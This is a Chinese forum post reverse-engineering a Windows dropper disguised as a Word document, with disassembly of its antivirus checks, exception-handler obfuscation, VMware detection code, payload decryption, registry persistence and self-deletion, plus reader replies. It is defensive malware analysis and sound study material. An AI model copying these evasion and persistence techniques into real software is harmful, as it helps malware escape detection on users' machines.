异常处理中的小dd
本帖最后由 zxcfvasd 于 2013-11-18 09:23 编辑样本基本信息:
作者: h_one
壳信息: 无
受威胁平台:windows
简介:
样本本身以word的图标伪装成.doc文件,其实是一个exe可执行文件。当用户双击次病毒时,该进程会遍历当前进程列表是否有avp.exe,360tray.exe,KsfafSvc.exe,RsTray.exe进程存在。
a.当检测到有杀软进程存在时,就只会创建一个文件‘请你按照表格填写资料.doc’
b.当检测到没有杀软存在时,会显现病毒原型。同样首先创建一个文件‘请你按照表格填写资料.doc’,还会创健alg.exe,最后创建批处理文件hostfix.bat,删除自身
上面提到的文件都会保存在临时文件目录下 c:\DOCUME~1\AYL\LOCALS~1\Temp\xxxxxx
ps:而这个病毒最吸引我的地方是,它在处理关键的行为是都会在异常处理函数中处理。这样一来提高了程序的隐秘性,增加了逆向难度。
详细分析过程:
进入程序主函数,会发现母本自身添加了一条异常链,跟进下断(这也是本病毒‘可爱’之处)
下图中的第一个call功能:CreateFileW当前程序也就是母本,ReadFile读出文件未0x1000字节,然后利用读出的数据计算得到一个值,并利用这个值验证母本是否有被修改。
call 0040189c 获取CreateProcessW函数地址
接下来跟进call 401F59
00401F64|.E8 17100000 call sample(?00402F80 ;调用ZwQuerySystemInformation(5)枚举进程信息
00401F69|.8945 FC mov ,eax
00401F6C|.68 18C34000 push sample(?0040C318 ;ASCII "avp.exe"
00401F71|.8B45 FC mov eax,
00401F74|.50 push eax ;ProcessInfo_buf
00401F75|.E8 61110000 call sample(?004030DB ;枚举进程名,寻找是否存在avp.exe
00401F7A|.83C4 08 add esp,0x8
00401F7D|.85C0 test eax,eax
00401F7F|.74 11 je Xsample(?00401F92 ;发现杀软不跳
00401F81|.8B0D 60D84000 mov ecx,dword ptr ds:
00401F87|.890D 60D84000 mov dword ptr ds:,ecx
00401F8D|.E9 A4000000 jmp sample(?00402036
00401F92|>6A 1F push 0x1F
00401F94|.E8 D8140000 call sample(?00403471
00401F99|.83C4 04 add esp,0x4
00401F9C|.50 push eax
00401F9D|.8B55 FC mov edx,
00401FA0|.52 push edx
00401FA1|.E8 35110000 call sample(?004030DB ;360tray.exe
跟进call 00402f80看看
注意上图call 403471函数的参数 ,call 403471函数是机密字符串函数,这里传入的
参数4,对应解密出NtQuerySystemInformation函数
参数1,对应解密出的ntdll
跟踪可以了解到
0x24------------ShellExecuteW
0x22------------Shell32.dll
0x18------------VritualAlloc
0x2 -------------Kernel32.dll
0x5 -------------GetVolumeInformation
0x6--------------GetAdatersInfo
0x3--------------Iphlpapi.dll
0x1--------------ntdll.dll
0x9--------------NtCreateKey
0xA--------------NtClose
0x8--------------NtOpenKey
然后调用LoadLibrary,GetProcAddress函数得到函数地址。之后一系列函数都是使用这种方法来得到调用地址的(在得到调用地址后,call 4033E0又将函数名,dll名加密)
之后
00403000|> /BA 01000000 /mov edx,0x1
00403005|. |85D2 |test edx,edx
00403007|. |74 5A |je Xsample(?00403063
00403009|. |8D45 FC |lea eax,
0040300C|. |50 |push eax
0040300D|. |8B4D F0 |mov ecx,
00403010|. |51 |push ecx
00403011|. |8B55 F8 |mov edx,
00403014|. |52 |push edx
00403015|. |6A 05 |push 0x5 ;枚举进程信息
00403017|. |FF15 C4D84000 |call dword ptr ds: ;ntdll.ZwQuerySystemInformation
利用ZwQuerySystemInformation()得到当前运行进程
遍历当前运行进程,查看是否存在杀软,若不存在就会执行到下图的call,否则不会执行这个call
跟进这个call
得到 rasdial /disconnect字符串
00401E02 .8965 E8 mov dword ptr ss:,esp
00401E05 .6A 15 push 0x15
00401E07 .E8 65160000 call sample(?00403471 ;/disconnect
00401E0C .83C4 04 add esp,0x4
00401E0F .50 push eax
00401E10 .6A 14 push 0x14
00401E12 .E8 5A160000 call sample(?00403471 ;rasdial
00401E17 .83C4 04 add esp,0x4
00401E1A .50 push eax
00401E1B .68 10C34000 push sample(?0040C310 ;ASCII "%s %s"
00401E20 .68 04010000 push 0x104
00401E25 .8D85 E4FEFFFF lea eax,dword ptr ss:
00401E2B .50 push eax
00401E2C .E8 0F300000 call sample(?00404E40 ;strcat
接下来就是制造异常的地方,然后在异常处理函数中执行病毒关键行为,使用的方法是利用time做种子,ecx = rand()这样就造成内存访问异常
(这就是此病毒亮点)
00401E55 .E8 A3270000 call sample(?004045FD ;_time
00401E5A .83C4 04 add esp,0x4
00401E5D .50 push eax
00401E5E .E8 72270000 call sample(?004045D5 ;timecola ->
00401E63 .83C4 04 add esp,0x4
00401E66 .C745 FC 00000>mov dword ptr ss:,0x0
00401E6D >B8 01000000 mov eax,0x1
00401E72 .85C0 test eax,eax
00401E74 .74 1A je Xsample(?00401E90
00401E76 .E8 64270000 call sample(?004045DF ;_rand
00401E7B .8985 D8FCFFFF mov dword ptr ss:,eax
00401E81 .E8 59270000 call sample(?004045DF ;_rand
00401E86 .8B8D D8FCFFFF mov ecx,dword ptr ss:
00401E8C .8801 mov byte ptr ds:,al ;会造成异常然后会到异常处理函数中
00401E8E .^ EB DD jmp Xsample(?00401E6D
00401E90 >C745 FC FFFFF>mov dword ptr ss:,-0x1
00401E97 .EB 1A jmp Xsample(?00401EB3
00401E99 .8D95 DCFCFFFF lea edx,dword ptr ss:
00401E9F .52 push edx
00401EA0 .E8 D4FEFFFF call sample(?00401D79
00401EA5 .83C4 04 add esp,0x4
00401EA8 .C3 retn
handle:
00404D68/$55 push ebp ;结构异常处理程序
00404D69|.8BEC mov ebp,esp
00404D6B|.83EC 08 sub esp,0x8
00404D6E|.53 push ebx
00404D6F|.56 push esi
00404D70|.57 push edi
00404D71|.55 push ebp
00404D72|.FC cld
00404D73|.8B5D 0C mov ebx, ;exception_REGISTRATION
00404D76|.8B45 08 mov eax, ;Execption_Record
00404D79|.F740 04 06000>test dword ptr ds:,0x6 ;异常标志
00404D80|.0F85 82000000 jnz sample(?00404E08
00404D86|.8945 F8 mov ,eax ; = Exception_Record
00404D89|.8B45 10 mov eax, ;Context
00404D8C|.8945 FC mov ,eax ; = Context
00404D8F|.8D45 F8 lea eax,
00404D92|.8943 FC mov dword ptr ds:,eax
00404D95|.8B73 0C mov esi,dword ptr ds:
00404D98|.8B7B 08 mov edi,dword ptr ds:
00404D9B|>83FE FF /cmp esi,-0x1
00404D9E|.74 61 |je Xsample(?00404E01
00404DA0|.8D0C76 |lea ecx,dword ptr ds:
00404DA3|.837C8F 04 00|cmp dword ptr ds:,0x0
00404DA8|.74 45 |je Xsample(?00404DEF
00404DAA|.56 |push esi
00404DAB|.55 |push ebp
00404DAC|.8D6B 10 |lea ebp,dword ptr ds:
00404DAF|.FF548F 04 |call dword ptr ds: ;
进入异常处理,,很明显的,可以知道作者是使用_try, _excepte
很明显的知道call dword ptr ds: 这个是关键call,,,跟进去看那看干了啥吧
00401E99 .8D95 DCFCFFFF lea edx,dword ptr ss:
00401E9F .52 push edx
00401EA0 .E8 D4FEFFFF call sample(?00401D79
00401EA5 .83C4 04 add esp,0x4
00401EA8 .C3 retn
见call 跟进
可以发现,在异常处理中调用CreateProcessW函数 断宽带连接(weisuo)
00401DB5|.51 push ecx
00401DB6|.8D55 AC lea edx,
00401DB9|.52 push edx
00401DBA|.6A 00 push 0x0
00401DBC|.6A 00 push 0x0
00401DBE|.6A 00 push 0x0
00401DC0|.6A 01 push 0x1
00401DC2|.6A 00 push 0x0
00401DC4|.6A 00 push 0x0
00401DC6|.8B45 08 mov eax,
00401DC9|.50 push eax ;rasdial /disconnect
00401DCA|.6A 00 push 0x0
00401DCC|.FF15 C0234100 call dword ptr ds: ;kernel32.CreateProcessW
004028E6 .E8 11F1FFFF call sample(?004019FC
这个call 创建临时文件C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\请您按照表格填写资料.doc",然后将母本头偏移0x20000处,大小0x6600字节数据拷贝出,并解密,然后WriteFile写入‘请您按照表格填写资料.doc’(欺骗普通用户)最后ShellExecuteW执行.doc文档
00401A9F|.E8 C7F5FFFF call sample(?0040106B
00401AA4|.83C4 0C add esp,0xC
00401AA7|.68 14254100 push sample(?00412514
00401AAC|.8D8D F8FDFFFF lea ecx,
00401AB2|.51 push ecx
00401AB3|.68 04254100 push sample(?00412504
00401AB8|.8B15 50D84000 mov edx,dword ptr ds:
00401ABE|.52 push edx
00401ABF|.E8 1FFAFFFF call sample(?004014E3 ;拷贝母本偏移0x20000,大小0x6600字节数据并解密,然后
00401AC4|.83C4 10 add esp,0x10 ;使用WriteFile将解密数据写如.doc文档中
00401AC7|.85C0 test eax,eax
00401AC9|.75 07 jnz Xsample(?00401AD2
00401ACB|.6A 00 push 0x0
00401ACD|.E8 4F2F0000 call sample(?00404A21
00401AD2|>8D85 F8FDFFFF lea eax,
00401AD8|.50 push eax
00401AD9|.68 C0C24000 push sample(?0040C2C0 ;UNICODE ""%s""
00401ADE|.8D8D F0FBFFFF lea ecx,
00401AE4|.51 push ecx
00401AE5|.E8 0C300000 call sample(?00404AF6 ;_swprintf
00401AEA|.83C4 0C add esp,0xC
00401AED|.6A 05 push 0x5
00401AEF|.6A 00 push 0x0
00401AF1|.6A 00 push 0x0
00401AF3|.8D95 F8FDFFFF lea edx,
00401AF9|.52 push edx
00401AFA|.68 CCC24000 push sample(?0040C2CC ;UNICODE "edit"
00401AFF|.6A 00 push 0x0
00401B01|.FF15 58D84000 call dword ptr ds: ;Shell32.ShellExecuteW
00401B07|.83C4 18 add esp,0x18
00401B0A|.8BE5 mov esp,ebp
00401B0C|.5D pop ebp
哈哈,,杀软都不在,欺骗人的.doc文档也运行起来了。呵呵,得露出怪叔叔面纱了
Whether to do?
使用同样的方法构造异常
00402907 .E8 F11C0000 call sample(?004045FD ;_time
0040290C .83C4 04 add esp,0x4
0040290F .50 push eax
00402910 .E8 C01C0000 call sample(?004045D5
00402915 .83C4 04 add esp,0x4
00402918 .C745 FC 00000>mov dword ptr ss:,0x0
0040291F >B8 01000000 mov eax,0x1
00402924 .85C0 test eax,eax
00402926 .74 14 je Xsample(?0040293C
00402928 .E8 B21C0000 call sample(?004045DF ;_rand
0040292D .8945 C8 mov dword ptr ss:,eax
00402930 .E8 AA1C0000 call sample(?004045DF ;_rand
00402935 .8B4D C8 mov ecx,dword ptr ss: ;ecx = 前一个_rand值
00402938 .8801 mov byte ptr ds:,al ;构造异常
顺利进入异常,进入次call
见call进入来到这里,,呵呵,还来做了一个虚拟机检查,方法是使用特权指令,(ps:这个病毒真是聪明啊,知道现在的杀软厉害,就不和杀软较劲,就这样就躲避了杀软的虚拟机引擎,然后杀软就很难发现它了)
004025B8 .C745 E4 01000>mov dword ptr ss:,0x1
004025BF .C745 FC 00000>mov dword ptr ss:,0x0
004025C6 .52 push edx
004025C7 .51 push ecx
004025C8 .53 push ebx
004025C9 .B8 68584D56 mov eax,0x564D5868
004025CE .BB 00000000 mov ebx,0x0
004025D3 .B9 0A000000 mov ecx,0xA
004025D8 .BA 58560000 mov edx,0x5658
004025DD .ED in eax,dx
004025DE .81FB 68584D56 cmp ebx,0x564D5868
004025E4 .0F9445 E4 sete byte ptr ss:
004025E8 .5B pop ebx
004025E9 .59 pop ecx
004025EA .5A pop edx
004025EB .C745 FC FFFFF>mov dword ptr ss:,-0x1
004025F2 .EB 17 jmp Xsample(?0040260B
004025F4 .B8 01000000 mov eax,0x1
接下来进入异常的第二个关键函数
00404DEB |.FF548F 08 |call dword ptr ds:
00402955 .8B65 E8 mov esp,dword ptr ss:
00402958 .C745 FC FFFFF>mov dword ptr ss:,-0x1
0040295F >33C0 xor eax,eax
00402961 .85C0 test eax,eax
00402963 .^ 75 A0 jnz Xsample(?00402905
00402965 .E8 A4F1FFFF call sample(?00401B0E
接下来在临时文件目录下创建alg.exe,拷贝出母本中的数据,并解密得到alg.exe的数据,然后写入
004016C0 |.0395 BCFDFFFF ||add edx,
004016C6 |.33C0 ||xor eax,eax
004016C8 |.8A02 ||mov al,byte ptr ds:
004016CA |.8B4D 0C ||mov ecx,
004016CD |.038D C8FDFFFF ||add ecx,
004016D3 |.33D2 ||xor edx,edx
004016D5 |.8A51 10 ||mov dl,byte ptr ds:
004016D8 |.33C2 ||xor eax,edx
004016DA |.8885 C4FDFFFF ||mov byte ptr ss:,al
004016E0 |.8B45 0C ||mov eax,
004016E3 |.0385 C8FDFFFF ||add eax,
004016E9 |.8B8D D0FDFFFF ||mov ecx,
004016EF |.038D BCFDFFFF ||add ecx,
004016F5 |.8A50 10 ||mov dl,byte ptr ds:
004016F8 |.2A11 ||sub dl,byte ptr ds:
004016FA |.8B45 0C ||mov eax,
004016FD |.0385 C8FDFFFF ||add eax,
00401703 |.8850 10 ||mov byte ptr ds:,dl
00401706 |.8B8D D0FDFFFF ||mov ecx,
0040170C |.038D BCFDFFFF ||add ecx,
00401712 |.8A95 C4FDFFFF ||mov dl,byte ptr ss:
00401718 |.8811 ||mov byte ptr ds:,dl
0040171A |.^ E9 68FFFFFF |\jmp sample(?00401687 ;母本中拷贝出的数据解密
解密得到的alg.exe数据,大小0x11000,,现在可以用loadpe将其dump出来,(ps:现在猜测应该是一个木马,待会儿享用吧。。。)
接下来这个call
00401771 |.50 push eax ;alg.exe数据
00401772 |.8B8D CCFDFFFF mov ecx,
00401778 |.51 push ecx ;size
00401779 |.E8 47FBFFFF call sample(?004012C5 ;以时间作为种子得到数据,然后修改子程序偏移F040处A字迹数据
004012DB |.E8 1D330000 call sample(?004045FD ;_time
004012E0 |.83C4 04 add esp,0x4
004012E3 |.50 push eax
004012E4 |.E8 EC320000 call sample(?004045D5 ;将时间保存在
004012E9 |.83C4 04 add esp,0x4
004012EC |.C745 FC 00000>mov ,0x0
004012F3 |.EB 09 jmp Xsample(?004012FE
004012F5 |>8B45 FC /mov eax,
004012F8 |.83C0 01 |add eax,0x1
004012FB |.8945 FC |mov ,eax
004012FE |>8B4D FC mov ecx,
00401301 |.3B4D 0C |cmp ecx, ;size
00401304 |.73 60 |jnb Xsample(?00401366
00401306 |.6A 0A |push 0xA
00401308 |.8B55 08 |mov edx, ;addr\
0040130B |.0355 FC |add edx,
0040130E |.52 |push edx
0040130F |.68 80C04000 |push sample(?0040C080
00401314 |.E8 472F0000 |call sample(?00404260 ;_strncmp(在子程序数据中寻找F1字符
00401319 |.83C4 0C |add esp,0xC
0040131C |.85C0 |test eax,eax
0040131E |.75 44 |jnz Xsample(?00401364 ;找到F1 地址F040
00401320 |.C745 F8 00000>|mov ,0x0
00401327 |.EB 09 |jmp Xsample(?00401332
00401329 |>8B45 F8 |/mov eax,
0040132C |.83C0 02 ||add eax,0x2
0040132F |.8945 F8 ||mov ,eax
00401332 |>837D F8 0A | cmp ,0xA
00401336 |.7D 24 ||jge Xsample(?0040135C
00401338 |.E8 A2320000 ||call sample(?004045DF ;_rand
0040133D |.8945 F4 ||mov ,eax ;以时间作为随便种子,然后写入子程序中
00401340 |.6A 02 ||push 0x2
00401342 |.8D4D F4 ||lea ecx,
00401345 |.51 ||push ecx ;Src
00401346 |.8B55 FC ||mov edx,
00401349 |.0355 F8 ||add edx,
0040134C |.8B45 08 ||mov eax,
0040134F |.03C2 ||add eax,edx
00401351 |.50 ||push eax ;修改找地址F040处
00401352 |.E8 492F0000 ||call sample(?004042A0 ;memcpy
00401357 |.83C4 0C ||add esp,0xC
0040135A |.^ EB CD |\jmp Xsample(?00401329 ;共写A字节,,,每次运行母本使子程序alg不同(这样增强alg.exe程序的生存力)
进入上图的最后一个call
char __cdecl sub_403260(void *Src, const void *a2, int a3, int a4)
{
for ( i = 0; i < 4; ++i )
*((_BYTE *)Src + i) ^= *(_BYTE *)(i + a4);
for ( j = 0; j < 6; ++j )
*((_BYTE *)a2 + j) ^= *(_BYTE *)(j + a4 + 4);
memcpy((void *)a3, Src, 2u);
memcpy((void *)(a3 + 2), a2, 6u);
memcpy((void *)(a3 + 8), (char *)Src + 2, 2u);
memcpy((void *)(a3 + 10), a2, 6u);
v6 = *(_BYTE *)(a3 + 1) ^ *(_BYTE *)a3;
for ( k = 2; k < 8; ++k )
{
*(_BYTE *)(k + a3) ^= v6;
v6 += *(_BYTE *)(k + a3);
}
v4 = *(_BYTE *)(a3 + 9) ^ *(_BYTE *)(a3 + 8);
result = v4 + v6;
v7 = v4 + v6;
for ( l = 10; l < 16; ++l )
{
result = l + a3;
*(_BYTE *)(l + a3) ^= v7;
v7 += *(_BYTE *)(l + a3);
}
return result;
}
时候再次来到
00404DAF |.FF548F 04 |call dword ptr ds: ;查看虚拟机
再次使用异常处理,执行病毒关键行为
00401D3B .8D95 D0FAFFFF lea edx,dword ptr ss:
00401D41 .52 push edx //alg.exe
00401D42 .E8 32000000 call sample(?00401D79
00401D47 .83C4 04 add esp,0x4
00401D4A .C3 retn
call 00401D79
00401DAC |.66:C745 DC 00>mov word ptr ss:,0x0
00401DB2 |.8D4D F0 lea ecx,
00401DB5 |.51 push ecx ; /pProcessInfo
00401DB6 |.8D55 AC lea edx, ; |
00401DB9 |.52 push edx ; |pStartupInfo
00401DBA |.6A 00 push 0x0 ; |CurrentDir = NULL
00401DBC |.6A 00 push 0x0 ; |pEnvironment = NULL
00401DBE |.6A 00 push 0x0 ; |CreationFlags = 0
00401DC0 |.6A 01 push 0x1 ; |InheritHandles = TRUE
00401DC2 |.6A 00 push 0x0 ; |pThreadSecurity = NULL
00401DC4 |.6A 00 push 0x0 ; |pProcessSecurity = NULL
00401DC6 |.8B45 08 mov eax, ; |
00401DC9 |.50 push eax ;
00401DCA |.6A 00 push 0x0 ; |ModuleFileName = NULL
00401DCC |.FF15 C0234100 call dword ptr ds: ; \CreateProcessW
00401DD2 |.B8 01000000 mov eax,0x1
创建alg.exe进程,(这个应该是病毒真正的面纱)
之后调用NtCreateKey创建键,然后ZwOpenKey,ZwSetValueKey设置注册表,"C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\alg.exe"键值,键名:StubPath
最后一个call 在临时文件目录下创建批处理文件hostfix.bat
作用就是删除母本自身。
0040268D > \8B4D 08 mov ecx,dword ptr ss:
00402690 .51 push ecx ; /StringToAdd
00402691 .8D95 C8FCFFFF lea edx,dword ptr ss: ; |
00402697 .52 push edx ; |ConcatString
00402698 .FF15 04B04000 call dword ptr ds:[<&KERNEL32.lstrc>; \lstrcatW
0040269E .6A 00 push 0x0 ; /hTemplateFile = NULL
004026A0 .6A 00 push 0x0 ; |Attributes = 0
004026A2 .6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
004026A4 .6A 00 push 0x0 ; |pSecurity = NULL
004026A6 .6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
004026A8 .68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
004026AD .8D85 C8FCFFFF lea eax,dword ptr ss: ; |
004026B3 .50 push eax ; |FileName
004026B4 .FF15 20B04000 call dword ptr ds:[<&KERNEL32.Creat>; \CreateFileW
004026BA .8985 C4FCFFFF mov dword ptr ss:,eax ;创建.bat文件
004026C0 .83BD C4FCFFFF>cmp dword ptr ss:,-0x1
004026C7 .75 07 jnz Xsample(?004026D0
004026C9 .33C0 xor eax,eax
004026CB .E9 93010000 jmp sample(?00402863
004026D0 >C785 D4FEFFFF>mov dword ptr ss:,0x0
004026DA .EB 0F jmp Xsample(?004026EB
004026DC >8B8D D4FEFFFF mov ecx,dword ptr ss:
004026E2 .83C1 01 add ecx,0x1
004026E5 .898D D4FEFFFF mov dword ptr ss:,ecx
004026EB >83BD D4FEFFFF>cmp dword ptr ss:,0x4B
004026F2 .73 46 jnb Xsample(?0040273A
004026F4 .8B95 D4FEFFFF mov edx,dword ptr ss:
004026FA .33C0 xor eax,eax
004026FC .8A82 34C04000 mov al,byte ptr ds:
00402702 .8985 DCFEFFFF mov dword ptr ss:,eax
00402708 .8B8D D4FEFFFF mov ecx,dword ptr ss:
0040270E .8A91 34C04000 mov dl,byte ptr ds:
00402714 .3215 30C04000 xor dl,byte ptr ds:
0040271A .8B85 D4FEFFFF mov eax,dword ptr ss:
00402720 .8890 34C04000 mov byte ptr ds:,dl
00402726 .8A0D 30C04000 mov cl,byte ptr ds:
0040272C .028D DCFEFFFF add cl,byte ptr ss:
00402732 .880D 30C04000 mov byte ptr ds:,cl
00402738 .^ EB A2 jmp Xsample(?004026DC
0040273A >68 04010000 push 0x104
最后同样是利用自己构造异常,然后在异常处理函数中运行hostfix.bat删除自身
母本到此的行为就分析完了,
来总结下,这个病毒为啥一开始杀软对它无动于衷吧
1.各种危险函数,重要api都是通过一个索引值,然后解密得到api函数名,之后通过LoadLirbry,GetProcAddress函数得到函数调用地址
2.通过ZwQuerySystemInformation 函数得到运行进程,然后查看是否存在杀软,若存在就不跟杀软较劲。就只创建一个.doc文档
3.现在的虚拟机大都用到虚拟机引擎运行病毒,此病毒会在会在异常处理中进行虚拟机检查,发现是在虚拟机中就退出·
4.发现不在虚拟中,同时没有杀软。然后就在母本载体上获取,alg.exe数据,并解密。然后自己构造异常,在异常处理中运行alg.exe。
虚拟机检查代码:
BOOL IsbVm()
{
BOOL bRet = TRUE;
_try
{
__asm
{
push edx
push eax
push ebx
moveax, 'VMXh'
mov ebx, 0x0
mov ecx, 0xA
mov edx, 'VX' //端口号
in eax, dx //从端口读取VM版本到eax
cmp ebx, 'VMXh'
setz
pop ebx
pop eax
pop edx
}
}
_except(EXCEPTION_EXECUTE_HANDLER)
{
bRet = FALSE;
}
return bRet;
}
int main(int argc, char *argv[])
{
if (IsbVm())
{
MessageBox(NULL, _T("Find VM"), _T("OK"), MB_OK);
}
else
MessageBox(NULL, _T("Not VM"), _T("Error"), MB_OK);
return 0;
}
接下来就是分析,真真的罪魁过手alg.exe
这是真的是够麻烦的了 分析的很详细,继续养肥了看 asd9988 发表于 2013-11-18 10:13 static/image/common/back.gif
分析的很详细,继续养肥了看
忘记上附件了,,{:1_903:}
赞一个{:301_999:} Acrkn0W 发表于 2013-11-18 09:34 static/image/common/back.gif
这是真的是够麻烦的了
{:1_904:}{:1_906:}
不明觉厉 "接下来就是分析,真真的罪魁过手alg.exe"
能不能分析下呢?文章很精彩。 看了LZ的帖子,我只想说一句很好很强大!论坛有你更精彩 真的很强大。。有木有
页:
[1]
2